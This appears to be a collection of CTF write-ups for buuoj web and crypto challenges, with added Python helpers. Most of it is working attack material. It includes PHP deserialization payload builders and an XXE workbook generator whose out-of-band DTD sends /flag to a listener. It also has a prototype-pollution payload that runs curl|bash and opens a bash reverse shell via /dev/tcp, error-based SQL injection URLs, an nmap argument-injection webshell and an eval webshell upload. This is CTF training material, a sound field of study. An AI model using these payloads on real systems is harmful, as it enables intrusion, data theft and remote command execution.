O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:18:"/proc/self/cmdline";s:7:"content";N;}
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:43:"/etc/apache2/sites-enabled/000-default.conf";s:7:"content";N;}
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:22:"/var/www/html/flag.php";s:7:"content";N;}
```

Read the source carefully.
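The two unserialize() challenges above ([极客大挑战 2019]PHP and AreUSerialz) both need hand-built payloads with details that are easy to get wrong: the private-property names in the first carry NUL bytes and a deliberately wrong property count, and the payload for the second must stay inside is_valid()'s printable range, which is exactly why the protected `\0*\0` prefix has to go. This added example (not from the original writeup) is a minimal PHP serializer in Python that produces both payloads and replicates is_valid() so the constraint can be checked before sending. Only string, int, bool and null values are supported; the count bump is CVE-2016-7124 and only works against PHP older than 5.6.25 / 7.0.10.

```python
import re
from urllib.parse import quote


def php_serialize_scalar(value):
    """Serialize the few scalar types these payloads need."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'   # length is in bytes, not characters
    raise TypeError(f"unsupported type: {type(value).__name__}")


def php_property_name(name, visibility, cls):
    """PHP mangles non-public names: private -> \\0Class\\0name, protected -> \\0*\\0name."""
    if visibility == "public":
        return name
    if visibility == "protected":
        return f"\x00*\x00{name}"
    if visibility == "private":
        return f"\x00{cls}\x00{name}"
    raise ValueError(visibility)


def php_serialize_object(cls, props, declared_count=None):
    """props: iterable of (name, visibility, value). declared_count overrides the real count."""
    props = list(props)
    body = "".join(
        php_serialize_scalar(php_property_name(n, vis, cls)) + php_serialize_scalar(v)
        for n, vis, v in props
    )
    count = len(props) if declared_count is None else declared_count
    return f'O:{len(cls)}:"{cls}":{count}:{{{body}}}'


def bump_property_count(serialized, delta=1):
    """CVE-2016-7124: a count larger than the real number of properties makes affected
    PHP versions skip __wakeup(). Rewrites only the outermost object header."""
    m = re.match(r'^O:\d+:"[^"]*":(\d+):\{', serialized)
    if not m:
        raise ValueError("not a serialized object")
    return serialized[:m.start(1)] + str(int(m.group(1)) + delta) + serialized[m.end(1):]


def is_valid(s):
    """Replica of AreUSerialz' check: every byte must be in 32..125 inclusive,
    so NUL (from protected/private names) and '~' are both rejected."""
    return all(32 <= ord(ch) <= 125 for ch in s)


def php_challenge_payload():
    """[极客大挑战 2019]PHP: private username/password, count bumped so __wakeup() is skipped,
    NUL bytes URL-encoded as %00 for the GET parameter."""
    s = php_serialize_object("Name", [("username", "private", "admin"),
                                      ("password", "private", 100)])
    return quote(bump_property_count(s), safe=':"{};,')


def areuserialz_payload(filename, visibility="public"):
    """AreUSerialz: op must be int 2 (== "2" in process() but !== "2" in __destruct(),
    so the destructor does not flip it back to write mode). Declared visibility is
    ignored by unserialize() on PHP >= 7.1, so 'public' names avoid the NUL bytes."""
    return php_serialize_object("FileHandler", [("op", visibility, 2),
                                               ("filename", visibility, filename),
                                               ("content", visibility, None)])
```

Run is_valid() over every payload you build for AreUSerialz: the protected variant fails it on the very first property, the public variant passes.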
[网鼎杯 2020 青龙组]filejava

Another web.xml leak: the download servlet does not canonicalise the filename, so /etc/passwd can be downloaded, and so can web.xml:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>DownloadServlet</servlet-name>
        <servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>DownloadServlet</servlet-name>
        <url-pattern>/DownloadServlet</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>ListFileServlet</servlet-name>
        <servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>ListFileServlet</servlet-name>
        <url-pattern>/ListFileServlet</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>UploadServlet</servlet-name>
        <servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>UploadServlet</servlet-name>
        <url-pattern>/UploadServlet</url-pattern>
    </servlet-mapping>
</web-app>
```

Download the class files named in web.xml, UploadServlet for example:

```
http://ip/DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/UploadServlet.class
```

Decompile them.
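Both Easy Java and filejava boil down to the same routine: read web.xml, turn each servlet-class into a path under /WEB-INF/classes/, download the .class file and decompile it. The added example below (not from the original writeup) does the path derivation from the Easy Java web.xml shown above, pairs it with the url-pattern, and builds the traversal-style download parameter used against filejava. The webapp root /usr/local/tomcat/webapps/ROOT and the depth of nine `../` are the values from this writeup, passed in as defaults; xml.etree is used because it does not resolve external entities, so parsing a web.xml you did not write is safe.

```python
import xml.etree.ElementTree as ET

# web.xml leaked from Easy Java via POST /Download?filename=/WEB-INF/web.xml
EASY_JAVA_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <welcome-file-list><welcome-file>Index</welcome-file></welcome-file-list>
  <servlet><servlet-name>IndexController</servlet-name>
    <servlet-class>com.wm.ctf.IndexController</servlet-class></servlet>
  <servlet-mapping><servlet-name>IndexController</servlet-name>
    <url-pattern>/Index</url-pattern></servlet-mapping>
  <servlet><servlet-name>LoginController</servlet-name>
    <servlet-class>com.wm.ctf.LoginController</servlet-class></servlet>
  <servlet-mapping><servlet-name>LoginController</servlet-name>
    <url-pattern>/Login</url-pattern></servlet-mapping>
  <servlet><servlet-name>DownloadController</servlet-name>
    <servlet-class>com.wm.ctf.DownloadController</servlet-class></servlet>
  <servlet-mapping><servlet-name>DownloadController</servlet-name>
    <url-pattern>/Download</url-pattern></servlet-mapping>
  <servlet><servlet-name>FlagController</servlet-name>
    <servlet-class>com.wm.ctf.FlagController</servlet-class></servlet>
  <servlet-mapping><servlet-name>FlagController</servlet-name>
    <url-pattern>/Flag</url-pattern></servlet-mapping>
</web-app>"""


def _ns(root):
    """Namespace prefix of the root element, e.g. '{http://xmlns.jcp.org/xml/ns/javaee}', or ''."""
    return root.tag[:root.tag.index("}") + 1] if root.tag.startswith("{") else ""


def servlets_from_web_xml(web_xml, classes_root="/WEB-INF/classes"):
    """Map servlet-name -> (url-pattern, class file path) from a leaked web.xml.
    Only the structure is read; xml.etree ignores DOCTYPE/external entities."""
    root = ET.fromstring(web_xml)
    ns = _ns(root)
    urls = {m.findtext(f"{ns}servlet-name"): m.findtext(f"{ns}url-pattern")
            for m in root.iter(f"{ns}servlet-mapping")}
    result = {}
    for s in root.iter(f"{ns}servlet"):
        name = s.findtext(f"{ns}servlet-name")
        cls = s.findtext(f"{ns}servlet-class")
        if name and cls:
            # com.wm.ctf.FlagController -> /WEB-INF/classes/com/wm/ctf/FlagController.class
            result[name] = (urls.get(name), f"{classes_root}/{cls.replace('.', '/')}.class")
    return result


def traversal_filename(webinf_path, webapp_root="/usr/local/tomcat/webapps/ROOT", depth=9):
    """Download parameter for a servlet that joins the user path onto a base directory
    without canonicalising it (filejava): climb out of the base directory with enough
    ../ to reach /, then walk down to the class file under the webapp root."""
    return "../" * depth + webapp_root.lstrip("/") + webinf_path
```

The depth only has to be at least the nesting depth of the servlet's base directory; extra `../` at the filesystem root are harmless, which is why nine works without knowing the exact base directory.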
The upload servlet parses the spreadsheet with Apache POI; see Apache-Poi-XXE-Analysis for the XXE in it.

On buuoj, request a second (internal) machine, 174.1.112.13, and under /var/www/html create test.dtd:

```xml
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://174.1.112.13:2999?p=%file;'>">
```

Then replace [Content_Types].xml inside the xlsx with:

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://174.1.112.13/test.dtd">
%remote;%int;%send;
]>
```

Note: the file name must start with excel- and end with .xlsx.

Upload the xlsx and listen on port 2999 (the output below is Python's http.server):

```
root@490bb1f24012:/var/www/html
Serving HTTP on 0.0.0.0 port 2999 ...
174.1.111.213 - - [21/May/2020 15:55:12] "GET /?p=flag{105d56b3-ae57-40a7-9f4d-5aa0010827ac} HTTP/1.1" 200 -
```

Related material:

Apache-Poi-XXE-Analysis
带外通道技术(OOB)总结 (a summary of out-of-band channel techniques)
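Building the malicious workbook by hand means unzipping, editing [Content_Types].xml and re-zipping while keeping every other part intact, and it is easy to corrupt the archive or put the DOCTYPE before the XML declaration. The added example below (not from the original writeup) automates it: it writes the external DTD for the OOB channel and rewrites [Content_Types].xml inside any .xlsx template, leaving the remaining parts untouched. The listener address, port and target file are parameters whose defaults are the values from this writeup; the nested parameter-entity declaration is written with `&#x25;` for a literal `%`, the well-formed spelling of what the hand-written DTD above does. The in-memory template in the test is a constructed stand-in for a real workbook, not a valid spreadsheet; the listener itself is `python3 -m http.server 2999`, whose log line is what the writeup shows.

```python
import io
import zipfile

DEFAULT_LISTENER = "http://174.1.112.13"   # attacker-controlled host from the writeup
CONTENT_TYPES = "[Content_Types].xml"      # first part POI's parser opens


def oob_dtd(listener=DEFAULT_LISTENER, port=2999, target="file:///flag"):
    """External DTD: read the target into a parameter entity, then leak it in the URL
    of a second entity. &#x25; is a literal % inside the entity value and expands to a
    parameter-entity reference when %int; is used."""
    return (f'<!ENTITY % file SYSTEM "{target}">\n'
            f'<!ENTITY % int "<!ENTITY &#x25; send SYSTEM \'{listener}:{port}?p=%file;\'>">\n')


def doctype(dtd_url):
    """Internal subset that pulls the remote DTD and fires the entities in order."""
    return ('<!DOCTYPE convert [\n'
            f'<!ENTITY % remote SYSTEM "{dtd_url}">\n'
            '%remote;%int;%send;\n'
            ']>\n')


def inject_doctype(xml_bytes, dtd_url):
    """Insert the DOCTYPE directly after the XML declaration (before it the document
    would be malformed), or at the very top if the part has no declaration."""
    text = xml_bytes.decode("utf-8")
    if text.lstrip().startswith("<?xml"):
        end = text.index("?>") + 2
        return (text[:end] + "\n" + doctype(dtd_url) + text[end:].lstrip("\r\n")).encode("utf-8")
    return (doctype(dtd_url) + text).encode("utf-8")


def build_xxe_xlsx(template_xlsx, dtd_url, part=CONTENT_TYPES):
    """Copy every part of the template workbook, replacing only the chosen XML part."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(template_xlsx)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        names = src.namelist()
        if part not in names:
            raise ValueError(f"{part} missing from template; not an OOXML archive?")
        for name in names:
            data = src.read(name)
            if name == part:
                data = inject_doctype(data, dtd_url)
            dst.writestr(name, data)
    return out.getvalue()


def read_part(xlsx_bytes, part=CONTENT_TYPES):
    """Read one part back out of a workbook (used to check the result)."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        return zf.read(part).decode("utf-8")


def constructed_template():
    """Minimal stand-in for a real .xlsx, constructed for the test; not a valid workbook."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(CONTENT_TYPES,
                    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"></Types>')
        zf.writestr("xl/workbook.xml", "<workbook/>")
    return buf.getvalue()
```

Save the result as excel-anything.xlsx (the challenge insists on that prefix and suffix), serve oob_dtd() as test.dtd on the listener host, and watch the http.server log for the GET /?p=... line.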
[网鼎杯 2020 朱雀组]phpweb

Source, once read:

```php
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a= gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func,$disable_fun)) {
        echo gettime($func, $p);
    }else {
        die("Hacker...");
    }
}
?>
```

(The entry "registregister_shutdown_function" is a typo in the original source and is reproduced as-is.)

Exploit via deserialization: unserialize is not in $disable_fun, and Test::__destruct() calls gettime($this->func, $this->p) with no blacklist check at all. So func=unserialize with p set to a serialized Test whose func and p are your own runs the blacklisted call from the destructor.

This one apparently can't be turned into a reverse shell.
crypto

[网鼎杯 2020 青龙组]you_raise_me_up

```python
from Crypto.Util.number import *
import random

n = 2 ** 512
m = random.randint(2, n-1) | 1
c = pow(m, bytes_to_long(flag), n)   # flag: the secret bytes, not part of the handout
print('m = ' + str(m))
print('c = ' + str(c))
```

A discrete logarithm problem: find x with m^x ≡ c (mod 2^512).

https://blog.csdn.net/qq_41956187/article/details/104981499

Using log() from Python's math module directly, you find that log(x, y) has a size limit (it works in floating point), which is what stumped me most during the competition.

After the contest I followed a senior's writeup and used SageMath. A simple install-and-use guide: https://www.jianshu.com/p/ddf9376334cd

```
┌────────────────────────────────────────────────────────────────────┐
│ SageMath version 9.0, Release Date: 2020-01-01                     │
│ Using Python 3.7.3. Type "help()" for help.                        │
└────────────────────────────────────────────────────────────────────┘
sage: m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386318986881041563704825943945069343345307381099559075
sage: c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373211308485605397024123180085924117610802485972584499
sage: n = 2**512
sage: m = Mod(m, n)
sage: c = Mod(c, n)
sage: discrete_log(c, m)
56006392793405651552924479293096841126763872290794186417054288110043102953612574215902230811593957757
```

```sh
pip3 install pycryptodome
```

```python
from Crypto.Util.number import *
flag = 56006392793405651552924479293096841126763872290794186417054288110043102953612574215902230811593957757
print(long_to_bytes(flag))
```
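Sage's discrete_log() does the job above, but a modulus of 2**512 is a special case that plain Python handles fine, which helps when Sage is not installed. The following is an added example, not from the original writeup or the challenge author: for an odd base m, the subgroup generated by m in (Z/2^k)* has order 2^t with t <= k-2, so the exponent can be recovered one bit at a time (Pohlig-Hellman with p = 2). The result is the exponent modulo 2^t, which is the flag itself as long as bytes_to_long(flag) < 2^t; the numbers at the bottom are the challenge values as transcribed above, and pow(g, -1, n) needs Python 3.8 or newer.

```python
def order_pow2(g, k):
    """Return t such that g has multiplicative order 2**t modulo 2**k (g must be odd).
    For k >= 3 the group exponent is 2**(k-2), so the loop always terminates."""
    if g % 2 == 0:
        raise ValueError("base must be odd to be invertible modulo 2**k")
    n, t, e = 1 << k, 0, g % (1 << k)
    while e != 1:
        e = e * e % n
        t += 1
    return t


def dlog_pow2(g, h, k):
    """Solve g**x == h (mod 2**k) for x in [0, 2**t), t = order_pow2(g, k).
    With the low i bits of x already known, h * g**(-x_known) equals
    g**(2**i * (b + 2r)) where b is bit i; raising that to 2**(t-1-i) gives 1 when
    b == 0 and the unique element of order 2 in <g> when b == 1."""
    n = 1 << k
    h %= n
    t = order_pow2(g, k)
    g_inv = pow(g, -1, n)
    x = 0
    for i in range(t):
        residual = h * pow(g_inv, x, n) % n
        if pow(residual, 1 << (t - 1 - i), n) != 1:
            x |= 1 << i
    if pow(g, x, n) != h:
        raise ValueError("h is not in the subgroup generated by g")
    return x


def long_to_bytes(x):
    """Same conversion as Crypto.Util.number.long_to_bytes, without the dependency."""
    return x.to_bytes((x.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    # values from [网鼎杯 2020 青龙组]you_raise_me_up as printed above
    m = int("391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386"
            "318986881041563704825943945069343345307381099559075")
    c = int("6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373"
            "211308485605397024123180085924117610802485972584499")
    try:
        x = dlog_pow2(m, c, 512)
        print(x)
        print(long_to_bytes(x))
    except ValueError as err:
        print("no solution with these values:", err)
```

Each iteration is one modular exponentiation with a 512-bit modulus, so the full 510-bit loop finishes in well under a second; the same code recovers any exponent shorter than the order of m.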
[网鼎杯 2020 青龙组]boom

Not recommended to run the binary directly.

0x01 Look the hash up on cmd5:

46e5efe6165a5afb361217446a2dbd01 → en5oy

0x02

```
This time: Here are have some formulas
3x-y+z=185
2x+3y-z=321
x+y+z=173
input: x = 74
input: y = 68
input: z = 31
```

0x03

```
Last time: Kill it
x*x+x-7943722218936282=0
input x: 89127561
```

Found by brute force:

```python
for i in range(10000000, 100000000):
    if i * (i + 1) == 7943722218936282:
        print(i)
        break
```
0x04 Week

web

[网鼎杯 2020 青龙组]notes

References:

https://www.anquanke.com/post/id/204856#h2-2
http://www.luyixian.cn/news_show_381840.aspx

If prototype pollution is new to you, read P神's article on it:

Prototype pollution: https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html

```js
var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');

var app = express();

class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author, "raw_note": raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

    get_all_notes() {
        return this.note_list;
    }

    remove_note(id) {
        delete this.note_list[id];
    }
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");

app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));

app.get('/', function(req, res, next) {
    res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
    .get(function(req, res) {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post(function(req, res) {
        let author = req.body.author;
        let raw = req.body.raw;
        if (author && raw) {
            notes.write_note(author, raw);
            res.render('mess', {message: "add note sucess"});
        } else {
            res.render('mess', {message: "did not add note"});
        }
    })

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

app.route('/delete_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to delete a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        if (id) {
            notes.remove_note(id);
            res.render('mess', {message: "delete done"});
        } else {
            res.render('mess', {message: "delete failed"});
        }
    })

app.route('/notes')
    .get(function(req, res) {
        let q = req.query.q;
        let a_note;
        if (typeof(q) === "undefined") {
            a_note = notes.get_all_notes();
        } else {
            a_note = notes.get_note(q);
        }
        res.render('note', {list: a_note});
    })

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell: '/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })

app.use(function(req, res, next) {
    res.status(404).send('Sorry cant find that!');
});

app.use(function(err, req, res, next) {
    console.error(err.stack);
    res.status(500).send('Something broke!');
});

const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))
```

The /edit_note route passes a user-controlled path straight into undefsafe(), so a path starting with __proto__ writes onto Object.prototype. /status then iterates `commands` with for...in, which also walks inherited enumerable properties, and exec()s whatever it finds. Pollute through /edit_note, then hit /status to trigger the payload:

```
id=__proto__.abc&author=curl%20http://174.1.147.117/shell.txt|bash&raw=a

// shell.txt
bash -i >& /dev/tcp/174.1.147.117/9999 0>&1
```
[极客大挑战 2019]HardSQL

First a plain login bypass, password=0'or(1)# (URL-encoded in the request):

```
GET /check.php?username=aaa&password=0%27or%281%29%23 HTTP/1.1
Host: d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.26 Safari/537.36 Edg/85.0.564.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

HTTP/1.1 200 OK
Server: openresty
Date: Mon, 27 Jul 2020 16:54:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 550
Connection: close
X-Powered-By: PHP/7.3.11

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>check</title>
</head>
<div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
<body background='./image/background.jpg' style='background-repeat:no-repeat ;background-size:100% 100%; background-attachment: fixed;'>
<br><br><br>
<h1 style='font-family:verdana;color:red;text-align:center;font-size:40px;'>Login Success!!</h1>
</br>
</body>
</html>
```

The payloads below avoid spaces entirely (parentheses separate the tokens) and use like in place of =. extractvalue() echoes only 32 characters, so the flag is read in two halves with left()/right():

```
http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cconcat(0x0a%2C(select(database())))))%23

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cconcat(0x0a%2C(select(group_concat(column_name))from(information_schema.columns)where((table_schema)like(database()))))))%23
#XPATH syntax error: 'id,username,password'

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cconcat(0x0a%2C(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))))))%23

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cconcat(0x0a%2C(select(password)from(H4rDsq1)))))%23
#XPATH syntax error: 'flag{9dd67d66-6e19-45bb-9beb-39'

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cright(concat(0x0a%2C(select(password)from(H4rDsq1)))%2C36)))%23

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cright(concat(0x0a%2C(select(group_concat(schema_name))from(information_schema.schemata)))%2C32)))%23
#XPATH syntax error: ',test,geek'

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cleft(concat(0x0a%2C(select(group_concat(schema_name))from(information_schema.schemata)))%2C32)))%23
```
PHP escapeshellarg()+escapeshellcmd() 之殇
谈escapeshellarg绕过与参数注入漏洞
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?php if (isset ($_SERVER['HTTP_X_FORWARDED_FOR' ])) { $_SERVER['REMOTE_ADDR' ] = $_SERVER['HTTP_X_FORWARDED_FOR' ]; } if (!isset ($_GET['host' ])) { highlight_file(__FILE__ ); } else { $host = $_GET['host' ]; $host = escapeshellarg($host); $host = escapeshellcmd($host); $sandbox = md5("glzjin" . $_SERVER['REMOTE_ADDR' ]); echo 'you are in sandbox ' .$sandbox; @mkdir($sandbox); chdir($sandbox); echo system("nmap -T5 -sT -Pn --host-timeout 2 -F " .$host); }
```
OUTPUT:
  -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
     and Grepable format, respectively, to the given filename.
```
Use nmap's output option to write the execution record to a file and thereby create webshell.php (see the figure).

Pass the webshell as the "IP" to be scanned and save it into 1.php.

My first idea was to execute a second command, but as the following explanation shows:

escapeshellcmd() escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands. This function should be used to make sure that any data coming from user input is escaped before it is passed to exec() or system(), or to the backtick operator.

A backslash (\) is inserted before the following characters: &#;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only when they are unpaired. On Windows, all of these characters plus % and ! are replaced by a space instead.

So that route is closed.

Switch approach: write a webshell instead. I did not think of this at first and only learned it from other people's blogs. Noob.

Using escapeshellarg()+escapeshellcmd() to bypass the `'`:
```
string(9) "1' new_IP"
string(14) "'1'\'' new_IP'"
string(16) "'1'\\'' new_IP\'"
# '1'\\'' == '1'+\\''
you are in sandbox 6e0de596e0dfd3884f1d7cc901ead8d9
string(53) "nmap -T5 -sT -Pn --host-timeout 2 -F '1'\\'' new_IP\'"
```
In the nmap command, `'1'\\''` == `'1'` + an escaped `\` + `''` (the last part is empty).

Likewise, the trailing `new_IP\'` can be handled by adding another `'`, as follows:
```
string(23) "1' new_IP -oG new.php '"
string(31) "'1'\'' new_IP -oG new.php '\'''"
string(33) "'1'\\'' new_IP -oG new.php '\\'''"
you are in sandbox 6e0de596e0dfd3884f1d7cc901ead8d9
string(70) "nmap -T5 -sT -Pn --host-timeout 2 -F '1'\\'' new_IP -oG new.php '\\'''"
```
This lets us smuggle in another "IP" to scan, which is the webshell, as follows:
```
1' <?php phpinfo();?> -oG new.php '
```
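To make the quoting mechanics above reproducible, here is an added example (not code from the challenge or from this write-up): a Python port of PHP's Unix-build escapeshellarg() and escapeshellcmd(), following the pairing rule quoted above, applied to the same inputs as the var_dump output, with shlex standing in for the shell's word splitting so you can see how many arguments nmap actually receives. The function names and the `chained`/`shell_words` helpers are mine; the expected strings are the ones shown above.

```python
import shlex

# Characters that escapeshellcmd() prefixes with a backslash (Unix build).
_CMD_SPECIAL = set('#&;`|*?~<>^()[]{}$\\\n\xff')


def php_escapeshellarg(s: str) -> str:
    """Port of PHP's escapeshellarg(): wrap in single quotes and turn every
    embedded ' into '\\'' (close quote, escaped quote, reopen quote)."""
    return "'" + s.replace("'", "'\\''") + "'"


def php_escapeshellcmd(s: str) -> str:
    """Port of PHP's escapeshellcmd(): backslash-escape shell metacharacters;
    a ' or " is escaped only when it has no partner later in the string."""
    out = []
    pending = None  # index of the quote expected to close the current pair
    for x, c in enumerate(s):
        if c in "\"'":
            if pending is None:
                nxt = s.find(c, x + 1)
                if nxt != -1:
                    pending = nxt        # opening quote with a partner: copied as is
                else:
                    out.append("\\")     # lone quote: escaped
            elif s[pending] == c:
                pending = None           # closing quote of the pair
            else:
                out.append("\\")         # the other quote type inside a pair
            out.append(c)
        elif c in _CMD_SPECIAL:
            out.append("\\" + c)         # note: a backslash becomes \\
        else:
            out.append(c)
    return "".join(out)


def chained(host: str) -> str:
    """What the challenge does: escapeshellcmd(escapeshellarg($host))."""
    return php_escapeshellcmd(php_escapeshellarg(host))


def shell_words(arg: str) -> list:
    """Approximate the shell's word splitting with shlex (POSIX rules):
    how many argv entries nmap would receive for this fragment."""
    return shlex.split(arg)


if __name__ == "__main__":
    for host in ["1' new_IP", "1' new_IP -oG new.php '"]:
        print(repr(php_escapeshellarg(host)))
        print(repr(chained(host)))
        print("argv seen by nmap:", shell_words(chained(host)))
```

Each function is sound on its own; the damage comes from chaining them, because escapeshellcmd() turns escapeshellarg()'s `'\''` into `'\\''`, which ends the quoted region early and lets the spaces inside a single "argument" become new argv entries (the `-oG new.php` above). For a feature like this, pass user input through escapeshellarg() alone, or avoid the shell entirely with an argv-style API, and treat nmap's output options as sensitive on any host-scanning endpoint.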
[ACTF2020 新生赛]Upload

```http
POST / HTTP/1.1
Host: 4bcd4b52-7c7b-4c97-82b3-086876b461be.node3.buuoj.cn
Content-Length: 324
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://4bcd4b52-7c7b-4c97-82b3-086876b461be.node3.buuoj.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryR0XkBShZAZ5y7Yfn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.26 Safari/537.36 Edg/85.0.564.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://4bcd4b52-7c7b-4c97-82b3-086876b461be.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

------WebKitFormBoundaryR0XkBShZAZ5y7Yfn
Content-Disposition: form-data; name="upload_file"; filename="fe1w0.phtml"
Content-Type: image/jpeg

<?php eval($_GET[xz]); ?>
------WebKitFormBoundaryR0XkBShZAZ5y7Yfn
Content-Disposition: form-data; name="submit"

upload
------WebKitFormBoundaryR0XkBShZAZ5y7Yfn--
```
Front-end validation plus a back-end blacklist.
[GXYCTF2019]BabySQli
```
